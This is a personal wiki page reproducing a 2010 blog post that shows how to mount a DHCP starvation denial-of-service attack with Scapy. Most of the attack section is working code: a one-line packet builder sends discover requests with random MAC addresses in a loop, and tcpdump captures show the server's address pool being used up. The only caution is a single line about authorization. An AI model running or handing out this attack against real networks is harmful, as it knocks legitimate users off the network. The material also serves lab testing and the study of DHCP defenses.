My Wiki!

Table of Contents

DHCP DoS with scapy

* http://funoverip.net/2010/12/dhcp-denial-of-service-with-scapy/ * http://hakipedia.com/index.php/Category:Network_Security

DHCP Denial of Service with scapy by foip on December 9th, 2010

1. Introduction

This is a small post explaining how to run a starvation attack against a DHCP server with only three lines of code (thanks to Scapy!).

Information & download regarding Scapy : 

http://www.secdev.org/projects/scapy/

Information about DHCP Starvation attack : 

http://hakipedia.com/index.php/DHCP_Starvation

2. Starvation attack with scapy

Running a starvation attack is nothing more than sending a lot of dummy DHCP requests, with random source MAC addresses. After few second, there is no more IP addresses available in the pool.

Warning: Don’t run this attack against networks you are not authorized !

This is to test against single host (note the new scapy version and the DST in IP package) 

[root@localhost scapy-2.1.0]# ./run_scapy 
INFO: Can't import python gnuplot wrapper . Won't be able to plot.
INFO: Can't import PyX. Won't be able to use psdump() or pdfdump().
WARNING: No route found for IPv6 destination :: (no default route?)
Welcome to Scapy (2.1.0)
 
>>> conf.checkIPaddr = False
>>> dhcp_request= Ether(src=RandMAC(),dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="10.0.8.174")/UDP(sport=68,dport=67)/BOOTP(chaddr=RandString(12,'0123456789abcdef'))/DHCP(options=[("message-type","discover"),"end"])
>>> sendp(dhcp_request,loop=0)

This is the ATTACK! 

[root@host1 ]$ scapy
Welcome to Scapy (v1.1.1 / -)
>>> conf.checkIPaddr = False
>>> dhcp_discover =  Ether(src=RandMAC(),dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68,dport=67)/BOOTP(chaddr=RandString(12,'0123456789abcdef'))/DHCP(options=[("message-type","discover"),"end"])
>>> sendp(dhcp_discover,loop=1)
...............................................................^C
Sent 70 packets.
interesting

T

o stop the attack, simply press Ctrl+C.

Does it work ? Yes, take a look at the following tcpdump captures.

2.1. The DHCP queries:

[root@host2 ]$ tcpdump -n -e -i eth0 port 68 ec:51:e2:20:5b:93 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 64:38:62:38:63:65, length 244 8e:97:0f:18:8a:19 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 39:33:39:37:65:66, length 244 28:a7:45:35:c0:47 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 38:34:66:64:33:63, length 244 …

2.2. Then the DHCP responses:

00:23:20:56:53:f0 > 64:38:62:38:63:65, ethertype IPv4 (0x0800), length 347: 192.168.0.1.67 > 192.168.0.117.68: BOOTP/DHCP, Reply, length 305 00:23:20:56:53:f0 > 39:33:39:37:65:66, ethertype IPv4 (0x0800), length 347: 192.168.0.1.67 > 192.168.0.118.68: BOOTP/DHCP, Reply, length 305 00:23:20:56:53:f0 > 38:34:66:64:33:63, ethertype IPv4 (0x0800), length 347: 192.168.0.1.67 > 192.168.0.119.68: BOOTP/DHCP, Reply, length 305 …

3. The End

Hope you enjoy.


Trace: dhcp_scapy

Navigation